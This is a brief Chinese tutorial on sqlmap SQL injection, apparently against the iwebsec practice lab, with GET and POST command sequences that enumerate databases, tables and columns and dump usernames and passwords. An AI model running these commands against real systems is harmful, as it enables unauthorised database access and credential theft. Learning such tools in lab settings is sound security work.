1.打开sqlmap
2.使用
(1)get注入
python sqlmap.py -u "指定注入点的URL"
#其中“-u”参数用于指定注入点的URL。
python sqlmap.py -u "指定注入点的URL" --dbs
#,其中参数“--dbs”用于列举数据库。
python sqlmap.py -u "指定注入点的URL" -D iwebsec --tables
#其中参数“-D”用于指定数据库名称,“--tables”参数用于列举表。
python sqlmap.py -u "指定注入点的URL" -D iwebsec -T user --columns
#其中参数“-T”用于指定表名称,“--columns”参数用于指定列出表中字段。
python sqlmap.py -u "指定注入点的URL" -D iwebsec -T user -C id,password,username --dump
#其中参数“-C”用于指定字段名称,参数“--dump”用于导出数据
(2)post注入
(注:此时将数据包存在了桌面上命名为123.txt)
python sqlmap.py -r C:\Users\caicq\Desktop\123.txt
#其中“-r”参数用于指定注入点的导出流量包的绝对路经文件
python sqlmap.py -r C:\Users\caicq\Desktop\123.txt --dbs
#,其中参数“--dbs”用于列举数据库。
python sqlmap.py -r 123.txt -D iwebsec --tables
#其中参数“-D”用于指定数据库名称,“--tables”参数用于列举表。
python sqlmap.py -r 123.txt -D iwebsec -T user --columns
#其中参数“-T”用于指定表名称,“--columns”参数用于指定列出表中字段。
python sqlmap.py -r 123.txt -D iwebsec -T user -C id,password,username --dump
#其中参数“-C”用于指定字段名称,参数“—dump”用于导出数据
版权归原作者 子沐,行! 所有, 如有侵权,请联系我们删除。